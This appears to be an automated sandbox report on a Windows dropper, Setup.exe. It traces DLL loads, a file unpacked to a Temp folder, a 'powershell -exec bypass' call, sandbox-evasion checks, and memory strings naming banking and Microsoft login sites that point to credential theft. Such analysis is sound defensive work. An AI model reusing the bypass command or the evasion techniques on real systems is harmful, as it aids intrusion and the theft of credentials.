                Source: C:\Users\user\Desktop\Setup.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\choice.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Setup.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Setup.exe | Static file information: File size 73409776 > 1048576
Source: Setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00DC0DE6 push ecx; ret 12_2_00DC0DF9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_071B05D8 push FFFFFFE8h; iretd 16_2_071B05DD

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\124531\Designing.com
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E326DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_00E326DD
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00DBFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00DBFC7C
Source: C:\Users\user\Desktop\Setup.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2030
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 647
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | API coverage: 3.7 %
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com TID: 1576 | Thread sleep time: -210000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6980 | Thread sleep count: 2030 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2800 | Thread sleep count: 647 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 348 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
Source: C:\Users\user\Desktop\Setup.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E0DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00E0DC54
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E1A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00E1A087
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E1A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00E1A1E2
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E0E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_00E0E472
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E1A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_00E1A570
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E166DC FindFirstFileW,FindNextFileW,FindClose,12_2_00E166DC
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00DDC622 FindFirstFileExW,12_2_00DDC622
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E173D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_00E173D4
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E17333 FindFirstFileW,FindClose,12_2_00E17333
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00E0D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00E0D921
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com | Code function: 12_2_00DA5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00DA5FC8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\124531\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\124531Jump to behavior
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512390549.00000000042C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2558815498.000000000427D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMCIZM
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2512390549.00000000042C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Designing.com, 0000000C.00000003.2512466126.000000000429C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: Designing.com, 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDO